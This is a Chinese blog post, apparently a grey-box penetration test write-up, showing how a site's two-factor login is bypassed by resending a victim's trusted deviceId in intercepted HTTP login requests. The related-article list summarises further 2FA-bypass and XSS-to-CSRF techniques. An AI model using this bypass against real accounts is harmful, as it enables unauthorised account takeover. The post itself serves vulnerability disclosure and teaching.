通过使用受害者的设备ID绕过双因素身份验证

最新推荐文章于 2024-09-05 16:37:49 发布
最新推荐文章于 2024-09-05 16:37:49 发布
阅读量436 收藏 6
点赞数 4
文章标签: 网络 安全 学习 运维 nginx
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80115097/article/details/141934077
版权

绕过双因素身份验证

一个网站的 URL,如下所示:https://redacted.com/login其界面如下:

现在,由于它是一个灰盒渗透测试,我获得了该网站的凭证。在这里,输入凭证后,我拦截了请求,它看起来如下所示:

POST /api/authentication/login-2fa HTTP/1.1
Host: redacted.com
Content-Length: 100
Sec-Ch-Ua: "Not)A;Brand";v="99", "Brave";v="127", "Chromium";v="127"
Sec-Ch-Ua-Mobile: ?0
Authorization:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json, text/plain, */*
Utcoffset: -420
Sec-Ch-Ua-Platform: "Windows"
Sec-Gpc: 1
Origin: https://redacted.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://redacted.com/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
Connection: close

{
"email":"admin@redacted.com",
"password":"PASSWORD",
"loginFrom":"ADMIN",
"deviceId":"8709184523"
}

现在转发此请求后,我被重定向到如下页面:

现在我只需输入 OTP 并登录网站,但这个双重身份验证的实现引起了我的注意,所以我尝试测试此功能。为此,我退出了我的帐户,然后再次访问了https://redacted.com/login

登录页面再次出现,我输入了我的凭据并拦截了相同的登录请求,如下所示

POST /api/authentication/login-2fa HTTP/1.1
Host: redacted.com
Content-Length: 100
Sec-Ch-Ua: "Not)A;Brand";v="99", "Brave";v="127", "Chromium";v="127"
Sec-Ch-Ua-Mobile: ?0
Authorization:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json, text/plain, */*
Utcoffset: -420
Sec-Ch-Ua-Platform: "Windows"
Sec-Gpc: 1
Origin: https://redacted.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://redacted.com/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
Connection: close

{
"email":"admin@redacted.com",
"password":"PASSWORD",
"loginFrom":"ADMIN",
"deviceId":"8709184523"
}

这次当我转发请求时,我直接登录了网站,而不是进入必须输入 OTP 的页面。嗯!似乎很奇怪。

让我们分析一下这里发生的事情。

最初看到这种情况后,我想到的是,当我们第一次在浏览器中登录网站时,它使用 deviceId 来跟踪用户。假设登录后,如果用户在第一次登录时输入了正确的 OTP,则应用程序假定此 deviceId 属于合法用户,因此当用户第二次通过同一浏览器登录时,浏览器会确认 deviceId 属于合法用户,而不是提示用户进入需要输入 OTP 的页面,而是直接让用户登录帐户。

我打开了第二个浏览器并再次访问了https://redacted.com/login的登录页面 现在输入凭证后,请求看起来如下所示:

POST /api/authentication/login-2fa HTTP/1.1
Host: redacted.com
Content-Length: 100
Sec-Ch-Ua: "Not)A;Brand";v="99", "Brave";v="127", "Chromium";v="127"
Sec-Ch-Ua-Mobile: ?0
Authorization:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json, text/plain, */*
Utcoffset: -420
Sec-Ch-Ua-Platform: "Windows"
Sec-Gpc: 1
Origin: https://redacted.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://redacted.com/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
Connection: close

{
"email":"admin@redacted.com",
"password":"PASSWORD",
"loginFrom":"ADMIN",
"deviceId":"3502118317"
}

在这里,当我转发请求时,系统提示我输入 OTP 的页面。这是因为第二个浏览器中的 deviceId 与第一个浏览器中的 deviceId 不同。

我再次访问了https://redacted.com/login,输入了我的凭证,使用 BurpSuite 捕获了请求,在这个请求中,我用受害者的 deviceId 参数替换了 deviceId 参数的值,该参数已经被验证为合法用户,然后就成功了!我登录后确认我的假设是正确的。

那么攻击场景是什么样的呢?为了绕过双重身份验证,攻击者只需要知道受害者的设备 ID,而不是在登录后显示需要输入 OTP 的页面,用户将自动登录而无需输入 OTP。

无偿获取网络安全优质学习资料与干货教程

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

黑客大佬
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【漏洞挖掘】——141、 逻辑漏洞之身份验证汇总
Fly_鹏程万里
07-26 86
身份验证是网站必不可少的一项业务功能设计,而身份验证机制的选择和设计也会带来诸多的安全问题,在本篇文章中我们将介绍网站使用身份验证机制以及这些验证机制中存在的安全漏洞并对一些安全防护机制和设计中存在的缺陷和绕过方式进行简易的刨析和演示,同时会对不同身份验证机制中存在的固有安全漏洞进行分析,最后我们会介绍如何使身份验证机制尽可能安全的方法。
SpringBoot编程基础教程:安全身份验证
程序员光剑
11-10 74
安全性在现代社会是一个非常重要的话题。从物理到数字,安全意味着保护用户、企业及其数据不受侵犯,防止信息泄露或丢失、隐私泄漏等安全风险发生。无论是个人电脑、手机、服务器还是其他网络设备安全都是非常重要的。另外,随着互联网的普及,越来越多的人把注意力放在了在线上以及网络交易中,而这些交易往往涉及到一些私密的信息。因此,如何确保在线交易中的信息安全就显得尤为重要。
Bypassing two-factor authentication 绕过重认证
jamesP777的博客
05-10 353
如果重认证的实现存在缺陷的话,则可能被直接绕过。如果是让用户先输入密码,再到另一个界面输入验证码,而实际上在输入验证码之前用户就已经是登录状态了。这种情况下,就可以在第一重认证之后直接跳转到登录之后的页面。甚至有时候,我们会发现网站就没有在加页面之前真正的去验证用户是否完成第二重认证。
传奇黑客教你绕重验证方法!
petpig0312的博客
05-22 3133
重验证(2FA)几乎是当下最靠谱的账户安全保护措施了,但传奇黑客 凯文·米特尼克 却发现了一个新的安全漏洞,通过向用户发送钓鱼登录页面,然后窃取用户名、密码和会话 cookie,就可以绕过重验证。这位 15 岁就成功入侵北美防空指挥系统的 KnowBe4 首席黑客官(CHO)在一段公开的视频中演示了如何进行入侵。他通过诱导受害者访问类似于“LunkedIn.com”这样容易与知名网站混淆的域名...
轻松绕过PayPal重认证
Coisini的博客
06-06 6752
国外的某白帽子发现了一个可以用来绕过PayPal的重认证的方法,这个重认证是用来保护用户帐号安全的. 这位白帽子同学叫做Joshua Rogers,据他说,仅仅知道用户点击eBay或PayPal时的cookie就可以绕过了.如果和PayPal一个”=_integrated-registration”函数有联系的cookie在用户的浏览器会话中存在,那么PayPal的重认证系统就会被绕过.也...
身份验证:2FA 简单旁路(因素身份验证。已获得有效的用户名和密码,但无权访问2FA 验证码)
anlalu233的博客
08-11 1525
使用已知账号密码登录: 此时为让输入验证码的页面: 单击“电子邮件客户端”按钮: 即: 点击返回实验室: 点击我的账户: 此时是wiener的账户,记下 URL:https://acf71f971f302381800d33d100e200b9.web-security-academy.net/my-account?id=wiener 点击登出注销wiener的账户: 点击我的账户使用受害者 carlos:montoya登录: 在此输入受害者账户验证码的页面将urlhttps://acf71f.
使用浏览器作为代理从公网攻击内网
neal1991的专栏
04-15 1878
介绍在Forcepoint,我们不断寻求改善我们产品所提供的防护。为此,我们经常研究不寻常或潜在新颖的攻击技术。最近的一个研究课题是从公网发起的针对localhost...
【实战演练】API自动化测试项目:API测试、身份验证、测试框架
[【实战演练】API自动化测试项目:API测试、身份验证、测试框架](https://img-blog.csdnimg.cn/8ff656a6d7f94255aaa5a99a5eaed0ca.jpeg) # 2.1 API测试工具和技术 ### 2.1.1 Postman Postman 是一个流行的 API ...
网络压缩之网络剪枝(network pruning)
前行居士
08-31 942
网络剪枝(network pruning)就是要把网络里面的一些参数剪掉。剪枝就是修剪的意思,把网络里面的一些参数剪掉。为什么可以把网络里面的一些参数剪 掉呢?这么大的网络里面有很多很多的参数,每一个参数不一定都有在做事。参数这么多的 时候,也许很多参数只是在划水,什么事也没有做。这些没有做的参数放在那边,就只是占空 间而已,浪费计算资源而已。为何就把它们剪掉呢?所以网络剪枝就是把一个大的网络中没 有用的那些参数把它找出来,把它扔掉。人刚出生的时候,脑袋是空空的,神经元跟神经元间 没什么连接
RK3588开发板利用udp发送和接收数据
cumtchw
09-01 589
RK3588开发板利用udp发送和接收数据
网络第五章:多路转接
qincjun的博客
09-05 301
2.HTTP1.1采用了长连接的方式来进行通信:建立连接,服务器响应完之后,不断开连接,活跃的用户对服务器发送请求,服务器都会正常响应;对不活跃的用户,不进行任何操作;events是分配好的epoll_event结构体数组.epoll将会把发生的事件赋值到events数组中 (events不可以是空指针,内核只负责把数据复制到这个events数组中,不会去帮助我们在用户态中分配内存).epoll通过这些值的设定,来监视fd的行为,如果fd做了这些行为,则会通过epoll_wait来反馈给上层,进行处理。
基于 AT 固件测试 ESP32 设备作为 WiFi AP 模式创建 TCP Server 开启 UART-to-WiFi 透传模式的指令序列
weixin_42083266的博客
09-04 400
【代码】基于 AT 固件测试 ESP32 设备作为 WiFi AP 模式创建 TCP Server 开启 UART-to-WiFi 透传模式的指令序列。
常用网络协议理解
最新发布
weixin_50600749的博客
09-05 281
应用:适合需要可靠传输的应用,如文件传输,实时语音等。低层次:需要手动处理数据的序列化和反序列化,数据的发送和接受,连接管理等。的序列化/反序列化(通常是 JSON),并且有内置的路由、认证、授权等功能。UDP协议: 使用用户数据报协议 (UDP) 提供无连接、尽力而为的通信。特性:不保证数据的顺序和完整性、没有连接和断开的过程。协议的作用,就是用于方规范数据格式,以及规定数据如何在网络中传输。特性:保证数据的顺序和完整性、有连接和断开的过程。使用传输控制协议 (TCP) 提供可靠的、面向连接的通信。
观测云核心技术解密:eBPF Tracing 实现原理
观测云的博客
09-03 920
通过 eBPF,开发者可以在不修改内核源码的情况下,对内核功能进行扩展和监控。eBPF Tracing 利用这一技术,对系统调用、内核函数等进行跟踪,从而实现对应用行为的深入洞察。
JAVA—网络通信
Hismybestlove的博客
09-05 719
本文是学习网络通信入门和简单了解UDP协议和TCP协议,学习和了解CS架构和简单了解BS架构和HTTP协议
网络安全宗旨和目标
网络研究观
09-02 557
网络安全涉及网络和相关数据及信息的保护与保障。它已从物理技术发展到防病毒和反网络钓鱼平台等软件方法。
网络编程学习:TCP/IP协议
kkbbaaii的博客
09-01 1568
网络编程学习:TCP/IP协议
csrf高级漏洞通过xss绕过的方法
05-19
CSRF(Cross-Site Request Forgery)攻击是指攻击者通过诱导受害者在已登录的网站上执行一些特定操作,从而在不知情的情况下进行一些非法操作。而XSS(Cross-Site Scripting)攻击则是指攻击者通过注入恶意脚本的方式,在受害者的浏览器中执行一些非法操作。 在某些情况下,攻击者可以利用XSS漏洞来绕过CSRF防御措施。具体方法如下: 1. 利用XSS漏洞注入恶意代码,获取受害者的CSRF Token。 2. 将获取到的CSRF Token发送给攻击者的服务器。 3. 攻击者使用获取到的CSRF Token伪造请求,向目标网站发送恶意请求。 4. 目标网站验证请求中的CSRF Token是否与用户当前的Token一致,如果一致则认为是合法请求,从而执行攻击者的恶意操作。 为了防止XSS漏洞绕过CSRF防御措施,可以采取以下措施: 1. 对用户输入的数据进行充分的过滤和验证,避免XSS漏洞的出现。 2. 在向用户发送包含敏感信息的页面时,使用HTTP-only Cookie,避免被恶意代码窃取。 3. 在生成CSRF Token时,将其与用户的Session ID绑定,避免被攻击者获取。 4. 对于重要的操作(如修改密码、删除账户等),要求用户输入密码进行再次认证,以防止CSRF攻击的发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值